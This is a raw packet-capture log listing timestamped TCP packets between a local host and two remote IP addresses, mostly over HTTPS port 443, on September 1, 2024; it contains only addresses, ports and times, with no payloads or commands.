Sep 1, 2024 21:56:27.129445076 CEST	443	49785	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.136434078 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.137922049 CEST	49784	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.137936115 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.241312981 CEST	443	49785	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.241580963 CEST	49785	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.241588116 CEST	443	49785	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.260293007 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.260576963 CEST	49784	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.260584116 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.355602980 CEST	443	49785	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.355648994 CEST	443	49785	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.355710983 CEST	49785	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.356028080 CEST	49785	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.357270002 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.357285023 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.357357979 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.357597113 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.357604980 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.387800932 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.387842894 CEST	443	49784	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.387885094 CEST	49784	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.388293982 CEST	49784	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.388700962 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.388714075 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.388784885 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.389000893 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.389009953 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.824136972 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.831000090 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.844505072 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.844517946 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.849740982 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.849754095 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.963287115 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.963494062 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.963501930 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.965004921 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:27.965174913 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:27.965183020 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.101567030 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.101629972 CEST	443	49788	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.101705074 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.101967096 CEST	49788	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.102623940 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.102643013 CEST	443	49790	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.102798939 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.103046894 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.103055000 CEST	443	49790	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.108244896 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.108366966 CEST	443	49787	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.108424902 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.108685017 CEST	49787	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.108999968 CEST	49791	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.109011889 CEST	443	49791	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.109074116 CEST	49791	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.114815950 CEST	49791	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.114824057 CEST	443	49791	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.537369967 CEST	49791	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.539016962 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.539475918 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.539519072 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.540437937 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.540719032 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.540733099 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.558974028 CEST	443	49791	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.559031963 CEST	49791	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.564420938 CEST	443	49790	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.564507008 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.564527035 CEST	49790	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.822715044 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.822755098 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.822825909 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.823215961 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.823231936 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.983782053 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.983848095 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.985120058 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:28.985126972 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.985389948 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:28.986588001 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.028505087 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.115940094 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.116082907 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.116091967 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.231972933 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.232043028 CEST	443	49792	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.232084990 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.232356071 CEST	49792	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.233055115 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.233093977 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.233160019 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.233372927 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.233386040 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.285150051 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.285219908 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.286678076 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.286689043 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.286968946 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.288321972 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.328500986 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.418509007 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.421056032 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.421073914 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.563654900 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.563703060 CEST	443	49793	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.563919067 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.564167023 CEST	49793	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.564851999 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.564888954 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.564954042 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.565140963 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.565155983 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.690018892 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.691627979 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.691652060 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.820471048 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:29.820611954 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:29.820626974 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.007836103 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.009252071 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.009277105 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.132827044 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.135621071 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.135632992 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.234003067 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.234045982 CEST	443	49794	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.234133959 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.234442949 CEST	49794	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.239300966 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.239330053 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.239401102 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.239624977 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.239639044 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.264249086 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.264291048 CEST	443	49795	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.264513969 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.264569044 CEST	49795	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.272207975 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.272237062 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.272317886 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.272500992 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.272515059 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.628051043 CEST	80	49744	132.226.247.73	192.168.2.4
Sep 1, 2024 21:56:30.628160954 CEST	49744	80	192.168.2.4	132.226.247.73
Sep 1, 2024 21:56:30.680185080 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.681997061 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.682032108 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.717863083 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.719142914 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.719163895 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.817447901 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.819561958 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.819588900 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.837337017 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.837481022 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.837502956 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.956919909 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.956958055 CEST	443	49796	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.957062960 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.957353115 CEST	49796	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.958589077 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.958620071 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.958679914 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.958870888 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.958884954 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.964567900 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.964616060 CEST	443	49797	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.964689970 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.965734959 CEST	49797	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.965936899 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.965956926 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:30.966015100 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.966182947 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:30.966196060 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.402589083 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.405284882 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.405309916 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.424336910 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.425636053 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.425667048 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.521995068 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.522224903 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.522241116 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.541589022 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.542690992 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.542705059 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.551361084 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.551394939 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.551446915 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.551704884 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.551717997 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.622133017 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.622169971 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.622236967 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.622643948 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.622657061 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.653589010 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.653630018 CEST	443	49799	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.653723955 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.654073954 CEST	49799	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.654725075 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.654736996 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.654820919 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.654993057 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.655004025 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.671281099 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.671320915 CEST	443	49798	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.671370029 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.671617031 CEST	49798	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.672112942 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.672130108 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.672184944 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.672322035 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.672333956 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.996895075 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:31.998545885 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:31.998565912 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.068208933 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.069926977 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.069952011 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.088277102 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.089721918 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.089737892 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.132416010 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.132657051 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.132667065 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.133651972 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.135560989 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.135588884 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.206280947 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.207952976 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.207983017 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.212050915 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.212074041 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.215540886 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.215564966 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.219502926 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.219518900 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.223748922 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.227562904 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.227571011 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.263082027 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.263708115 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.263726950 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.277901888 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.277962923 CEST	443	49800	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.278136015 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.278357029 CEST	49800	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.367808104 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.367851973 CEST	443	49802	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.371594906 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.371871948 CEST	49802	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.373106003 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.373128891 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.375718117 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.375932932 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.375946045 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.391567945 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.391611099 CEST	443	49803	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.395968914 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.396363020 CEST	49803	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.396749973 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.396769047 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.396831036 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.399800062 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.399811029 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.544620037 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.544696093 CEST	443	49801	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.547624111 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.548116922 CEST	49801	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.815041065 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.818897963 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.818921089 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.858977079 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.867820024 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.867855072 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.928869963 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.929020882 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.929035902 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.979104996 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:32.979243040 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:32.979257107 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.057769060 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.057812929 CEST	443	49804	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.057970047 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.058268070 CEST	49804	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.058957100 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.058984995 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.059197903 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.059417963 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.059432983 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.111535072 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.111576080 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.111845016 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.111855984 CEST	443	49805	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.111866951 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.111897945 CEST	49805	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.112360954 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.112380981 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.112443924 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.115506887 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.115520954 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.541858912 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.543476105 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.543505907 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.560101986 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.562201023 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.562238932 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.678174019 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.678512096 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.678527117 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.697592974 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.697701931 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.697721958 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.826778889 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.826822042 CEST	443	49806	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.826874018 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.827435970 CEST	49806	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.828075886 CEST	49808	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.828104019 CEST	443	49808	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.828152895 CEST	49808	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.828341007 CEST	49808	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.828356028 CEST	443	49808	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.836353064 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.836395025 CEST	443	49807	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.836435080 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.847058058 CEST	49807	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.852446079 CEST	49809	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.852492094 CEST	443	49809	198.185.159.177	192.168.2.4
Sep 1, 2024 21:56:33.852570057 CEST	49809	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.852786064 CEST	49809	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:56:33.852799892 CEST	443	49809	198.185.159.177	192.168.2.4
